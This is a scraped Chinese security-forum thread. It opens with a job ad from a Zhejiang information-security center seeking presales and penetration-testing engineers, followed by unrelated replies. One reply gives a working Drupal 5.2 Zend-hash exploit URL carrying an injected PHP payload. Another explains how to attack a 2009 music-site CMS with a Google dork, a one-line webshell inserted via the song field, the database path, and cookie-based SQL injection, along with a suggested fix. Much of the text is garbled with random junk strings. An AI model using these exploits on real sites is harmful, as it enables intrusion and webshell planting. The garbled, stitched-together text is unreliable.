最近看过此主题的会员

返回列表 发帖

[人才招聘] [招聘] 浙江政安信息安全研究中心招贤纳士啦!

  • 招聘职位: 其他职位
  • 公司名称: 浙江政安信息安全研究中心
  • 工作地点: 浙江
  • 专业要求: 计算机专业 
  • 学历要求: 大专
  • 工作经验: 1年以上
  • 职位薪金: 面议
  • 年龄要求: 不限
  • 性别要求: 不限 
  • 公司网址: http://www.sitedirsec.com
  • 简历邮箱: 352113371@qq.com
  • 联系电话: 13000000000
  • 在线QQ: 352113371
  • 安全助手: 通过非安全中国管理人员招聘/求职,QQ群:57116771


  • ++++++++++浙江政安信息安全研究中心相关说明++++++++++

    浙江政安信息安全研究中心招贤纳士啦!
    " ?: y6 O9 n9 f9 n2 h4 Z* X简历投递:352113371@qq.com
    , G( j8 `0 @/ J( d9 `& P
    , A! S6 o, l/ V9 ?* v. t" ]职位:售前工程师 2名 【7000-15000】% e8 S0 {7 \) J0 T$ }+ E9 P
    岗位职责:3 D& W$ f  Q. ]; |' u+ q8 X3 ~, M
    1、配合销售人员参与信息安全咨询服务及安全服务项目(包括渗透测试、漏洞扫描、APP安全测试、应急响应、安全加固、风险评估、安全规划、安全管理咨询等)的售前工作;
    $ P; ?! P) F$ n( R3 o  v: O1 v2、配合销售人员准备与用户的技术交流、PPT等技术文件;" p; I1 P& P9 x( P. A( K$ v/ ~
    3、负责信息安全咨询服务及安全服务的实施工作;
    ! d8 R/ p! @8 b9 K4、负责信息安全解决方案的售前,对信息安全解决方案项目进行售前技术支持,并协助销售人员跟进项目进度,配合项目的招投标工作(特别是技术方案的编写);/ L* U/ u9 X5 [' P  S
    5、负责信息安全咨询项目的现场调研、资料搜集、课题研究及用户答疑等工作;, ~  b* i" s6 K
    任职要求:
    ! n$ Z. d/ _9 g4 l1 B1、信息安全及计算机相关专业毕业,正规院校大学本科及以上学历。至少2年以上工作经验、有非常好的语言、文字组织能力;
    # _; V( I, G1 j1 ?2、有较广泛的IT基础知识,熟悉主流应用系统架构,对网络架构、加密认证类设备、网络安全产品深入了解;
    ( K3 z: \( D- K- t$ E" l3、熟悉企业IT规划的方法论和过程;
    6 B) W' I+ j6 E  z6 v( t4、为客户提供过信息安全项目策划,具有丰富的信息安全项目策划和实施经验;+ ?$ f" q9 L3 X0 y  l7 y/ Q
    5、熟练掌握ISO27001等国际国内信息安全管理体系有关标准,掌握或从事过风险评估工作;
    9 j1 M% k3 g! r- }2 r6、具有良好的客户沟通能力及技巧;8 C) `3 `) |! i
    7、能适应经常性短期出差;  x1 W" Z2 p! j* l
    8、具有CISSP、CISA、CISP、ISO27001LA、ITIL等相关资质者优先;5 }- E$ ^/ K8 x

    ) q/ H5 e  ^+ r: `. N' m8 t# W职位:高级信息与网络安全工程师 3名 【5000-25000】; T2 |& s0 W. H! Z/ z( a0 D
    岗位职责:- z; K' ]2 }; E, O) f: s( V8 {
        常驻政府单位或国有企业用户现场,根据用户需求提供现场信息与网络安全相关的支持服务,具体内容包括日常安全设备巡检、安全风险事件处理和应急响应、应用系统漏洞扫描和渗透测试、系统安全加固等工作。相关事件要求能形成规范的书面文字材料进行汇报。
    $ U2 P! n5 J, y* I7 u, N8 y8 V. a任职条件:
    1 d( m! L$ I$ c- F5 K1 [) v1、1-5年以上信息与网络安全相关工作经验。具有CCIE/CISP/CISSP等安全相关证书者优先;具有政府单位、大型企业单位驻场服务经历的优先;最终视工作年限和工作经验确定薪酬。% d5 [% J9 {' {& V- x
    2、熟悉路由器、交换机、防火墙、入侵检测等常见网络安全产品;熟悉windows、linux等操作系统;熟悉常见数据库如Oracle、Sql server、My sql等;* Z1 O( b  `5 I2 W( z$ w
    3、对信息安全有兴趣和爱好,具有较强的学习能力。如无CISP证书的要求在入职以后3个月内取得证书。有渗透测试和应用开发经历与经验者优先;
    8 U) F1 m5 _* R. F/ }4、有高度的责任心,能适应工作压力;具有较强的沟通协调能力,良好的口头表达和技术文档撰写能力。面试时要求提供3份以上本人撰写的安全相关技术文档和报告材料。; K, {, H) Z' _% I* k; G: ^
    ( ^; D# T/ B: L4 J+ L4 Q
    职位: 安全服务工程师 3名 【5000-15000】4 J( n7 q4 I- [. _" j# _+ T
    任职要求:
    - {* n, `2 p, X$ c1. 能力突出者专业学历不限;3 |) h& v1 K: g* L
    2. 对网络安全攻防有浓厚的兴趣并愿意为之倾注大量精力,有较强的工作责任心和主动学习能力;
    : `9 k8 A% e+ M# X) ], R7 Z& {3. 熟练使用PHP、Python、Perl等任意一门编程语言;
    " e% ?2 y  I& D: g8 }4. 掌握MSSQL、MySQL、Oracle、SQLite等一种或几种主流数据库结构以及语法;6 q6 Z% A3 ~) _( y% b. Y3 y
    5. 熟练使用各种安全扫描,渗透工具,有丰富的安全渗透经验并能能独立完成渗透测试;3 L" Y: F. b: i9 E/ l3 p2 ?# d* M1 Q
    6. 熟悉常见Web漏洞产生的原理,熟悉Windows、Linux平台渗透测试、权限提升、后门分析、安全加固等。! C: x* ^) V+ |5 h# G0 J! m& G
    优先考虑:
    / ~' K( [: i2 I' F) k2 {# O1.有能够进行项目管理、售前工作者,对具体技术能力可以适当降低0 m6 f" t& ?) g# T8 w' X1 ?
    2.熟悉iOS & Android APP 等移动安全测试/ a* b, Z1 X8 ?9 b: R" \
    3.对智能设备、硬件安全测试有了解,熟悉相关常见协议
      }/ k% _0 R8 I* A* q$ ]4.有代码审计相关经验者,具备逆向分析能力更佳;; A3 G' C6 k' j" n% K. o( W
    5. 在漏乌云、洞盒子、补天等漏洞平台提交过相关有效漏洞;
    1 g( r/ x. m8 e0 t  l6.具有其它可以秒杀面试官能力
    ) E# s" u) ]7 a8 ~+ N5 E7.具有CISSP、CISA、CISP、ISO27001LA、ITIL等相关资质者优先;

     

    您可能还想看的主题:

    安全宝招聘安全服务工程师

    关于信息安全等级保护

    600万用户遭泄密案告破 CSDN首吃信息安全罚单

    Windows 优化大师 Pro v7.99 木蚂蚁社区绿色专版

    合优网站管理系统存在SQL注射。。。原创首发~

    启明星辰招聘

    [HR]北京安码科技 信息安全工程师

    [HR]上海四域 信息安全工程师

    《信息安全架构》

    继续信息安全。

    非安全中国网免责声明 1、本帖所有言论和图片纯属发表者个人意见,与本站立场无关;
    2、本话题由:無情发表,本帖发表者無情符合《关于版权及免责声明》6大管理制度规定,享有相关权利;
    3、其他单位或个人使用、转载或引用本帖时必须征得发表者無情和本站的同意;
    4、本帖作品部分转载自其它媒体并在本站发布,转载的目的在于传递更多信息,并不代表本站赞同其观点和对其真实性负责;
    5、本帖如有侵犯到贵站或个人版权问题,请立即告知本站,本站将及时予与删除,并致以最深的歉意;
    6、本站管理员和版主有权不事先通知发帖者而删除本文。

    php的zend哈希漏洞利用问题
    Drupal <= 5.2 PHP Zend Hash Vulnerability Exploitation VectorExample: http://www.example.com/drupal/?_menu[callbacks][1][callback]=drupal_eval&amp;_menu[items][][type]=-1&amp;-312030023=1&amp;q=1/<?phpinfo();
    9 o. x# `* K& J# ~% m. j: g+ C8 K( }5 ?5 b; Z! X% t
    7 t. d. e! O5 A2 ^: |
    ) f0 ~4 n, I4 U9 _

      @5 o/ e9 P# v, \6 {% X) ?* m0 a( A7 e7 _7 t6 K6 i

    1 B# S) n9 u; n2 H2 z, f5 t
    : A* Z/ b, x0 G" {( H: X
    / H" M2 x  V) B$ ~# ]" u
    $ q3 B2 m9 J& E0 r7 A2 g3 L0 y+ o1 k, f) `* d

    ) ]5 K: e# s( c+ }# }; J+ N$ I$ ~, x9 K$ U  D$ j' o& Q/ u3 e

    7 X6 N4 Y. A: b# S) V* w) @/ X- W% Z3 M; |7 d1 _  |1 p
    * f. O6 P: A; O5 e( {1 `
    1 b3 I2 |3 U( U

    ; B9 C# t8 O; }) I0 [) ]
    . q- v4 [$ E# P公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    发贴看看自己积分,呵呵,好像没有楼猪的多。
    + Z6 S! H$ X7 l  Y( n4 I( `3 k! q+ G- F( }
    + ^: n5 W& t6 L4 p0 {( k; r; g

    $ ?8 G$ l3 ]! A7 k
    ) E' J+ ?) g" ]* L. g+ _0 g
    3 I# q* ?/ u8 ]* r" I  T: U
    8 J( N! d0 B# p2 Z
    $ B2 O* {7 s4 S( o
    ) P( x+ K' K# ]2 S. Q, w, Y
    ( E5 |+ E0 \7 X
    0 _  q; l/ h  e# _; T8 ?& S
    5 v3 q- |9 P: ?2 E7 D1 P1 D: `' v3 B, ^5 W, o  n% Y
    ; _  h, l6 l! @; a$ j
    % ~) M: [7 L; `! A
    ! J4 D+ E+ m: a4 H7 L& _1 M
    7 @* p* |  ~/ c

    3 y7 W, a1 v# j0 C
    # c3 c) L$ w% E) r7 ^公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    8603音乐网管理系统v2009.1001漏洞
    8603音乐网管理系统 v2009.1001 数据库可插入一句话和Cookies注入

    + B! `# f. ~2 |# `0 U) U
    数据库未作任何处理,可以插入一句话。继续插入经典一句话

    # }3 f, s! ?$ W# w( M

    # a! U/ I. r9 e4 i2 H4 t; E
    Google: inurl:player.asp?classid 打开网页,点击 请你添加歌曲,在歌曲地址处插入一句话,提交,连接数据库即可。数据库地址:/data/%23datalink.asa
    0 g% y& |7 L! m) W# z% Y" z. _
    二,classid处可以Cookies注入classid=request("classid")set rs1=server.createobject("adodb.recordset")rs1.open "select * from feilei where classid="&amp;classid,conn,1,3classid=rs1("classid")

    1 f8 J5 [3 k1 o1 m& g  h6 d+ |
    这里多啰嗦几句。关于Cookies注入的问题。有人问寡人那几句代码为什么存在Cookies注入。这个其实寡人在 微尔网站管理系统V1.51的cookies注入 的文章里说过了。这里在啰嗦几下。如有错误,请不吝指正。

    2 [; q, d7 O  w8 `! Z) F+ a
    变量都可以用request来直接取得的,并且是有先后顺序的,譬如你用这样的语句request("id")取得id变量,asp会先从Form过来的数据找变量,然后是QueryString部分,然后是Cookie部分。但是如果你指定了request.cookies("id")就只会从cookie里找变量内容,没有的话就为空,同理,如果用的是request.form("id")就会只从表单里取变量而不会理会其他提交方式中的内容。这三个取得变量的地方也是是我们经常提交数据的地方,并且都是很容易就能修改的,而player.asp他写的是直接request("classid"),并没有指明是那种方式,即使加了防注入,我们也可以突破防注入,用cookies注入,修补办法就是加上request的方法,把request("classid")改为request.queryString("classid"),

    ! s7 `. D' g6 J2 E! q% y' L
    看看防注入页面,防注入页面只对 '----- 对 get query 值 的过滤.和 '-----对 post 表 单值的过滤.

    ! y, \0 g7 I) m" I0 z' q
    也就是过滤了request.QueryString和request.form的方法,而并没有过滤request.cookies的方法,cookies注
    2 M' ?" w) a- i: P
    入也就产生了

    % o9 Z/ @" H6 R/ t3 k
    用注入中转。

    6 w) N% c! @0 c. d) k  `0 `
    . d8 ~: F! ?* ]8 J
    5 z0 a7 E0 x! s+ ~+ n# i% G) |1 I+ Y. {

    + o3 x% S1 b( n2 b
    2 Y: o  o; v0 o# t# E' E
    / I& I: D1 S2 t# ^
    9 l8 P4 A( y5 ~9 _3 l( q. U/ K# j& T' j
    # V( `' `" ^. T! J' s" \

    ' j: G+ J- t% {6 z, P; p) v0 w3 O3 t+ }4 ?% G: f7 d( w" e9 b

    8 T- ^* m; w* h; f* p" d8 b/ B6 C# `  K& l- }3 z) U* v
    5 k0 D2 v3 ^/ B! ?( Z7 k' `& e

    " f) N$ m# o4 m8 F+ y- v6 {. N& Q4 k  f$ M$ G0 |, d9 h. O

    ! E6 d4 I- T- T! V" }/ c) m! U/ Q: ?6 i& f' R
    公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    返回列表